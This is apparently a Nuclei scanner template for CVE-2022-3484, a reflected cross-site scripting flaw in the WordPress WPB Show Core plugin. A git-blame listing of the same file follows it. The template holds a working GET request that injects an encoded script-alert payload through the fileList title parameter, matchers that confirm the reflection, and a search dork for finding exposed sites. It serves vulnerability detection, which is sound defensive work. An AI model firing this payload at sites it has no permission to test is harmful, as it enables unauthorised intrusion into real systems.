nuclei-templates/http/cves/2022/CVE-2022-3484.yaml

id: CVE-2022-3484

info:
  name: WordPress WPB Show Core - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.
  remediation: |
    Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3484
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3484
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.45981
    cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpb_show_core_project
    product: wpb_show_core
    framework: wordpress
    google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php
  tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "wpb_jplayer_setting")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 490a0046304402201a749cdffd411187ddb33010e8f5216620153b04b07fa73fc4fc631a83f40fb2022002510fd3818a0349b4e36bb35d207c52445a1777f8df6d4ef0baf5cb38af6080:922c64590222798bb761d5b6d8e72950
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00			`id: CVE-2022-3484`

			`info:`
Dashboard Content Enhancements (#6358) Dashboard Content Enhancements 2022-12-13 20:36:48 +00:00			`name: WordPress WPB Show Core - Cross-Site Scripting`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00			`author: theamanrawat`
			`severity: medium`
			`description: \|`
Dashboard Content Enhancements (#6358) Dashboard Content Enhancements 2022-12-13 20:36:48 +00:00			`WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability.`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-3484`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00			`classification:`
Auto Generated CVE annotations [Wed Nov 23 08:56:41 UTC 2022] :robot: 2022-11-23 08:56:41 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00			`cve-id: CVE-2022-3484`
Auto Generated CVE annotations [Wed Nov 23 08:56:41 UTC 2022] :robot: 2022-11-23 08:56:41 +00:00			`cwe-id: CWE-79`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.00119`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`epss-percentile: 0.45981`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:::::wordpress::`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00			`metadata:`
Update CVE-2022-3484.yaml 2022-11-24 09:22:10 +00:00			`verified: true`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: wpb_show_core_project`
			`product: wpb_show_core`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`framework: wordpress`
			`google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00			`- method: GET`
			`path:`
Update CVE-2022-3484.yaml 2022-11-16 10:52:06 +00:00			`- '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'`
Added template for CVE-2022-3484 2022-11-15 16:58:27 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(content_type, "text/html")'`
Update CVE-2022-3484.yaml 2022-11-16 10:52:06 +00:00			`- 'contains(body, "wpb_jplayer_setting")'`
			`- 'contains(body, "<script>alert(document.domain)</script>")'`
			`condition: and`
Auto Template Signing [Tue Jan 30 06:46:18 UTC 2024] :robot: 2024-01-30 06:46:18 +00:00			`# digest: 490a0046304402201a749cdffd411187ddb33010e8f5216620153b04b07fa73fc4fc631a83f40fb2022002510fd3818a0349b4e36bb35d207c52445a1777f8df6d4ef0baf5cb38af6080:922c64590222798bb761d5b6d8e72950`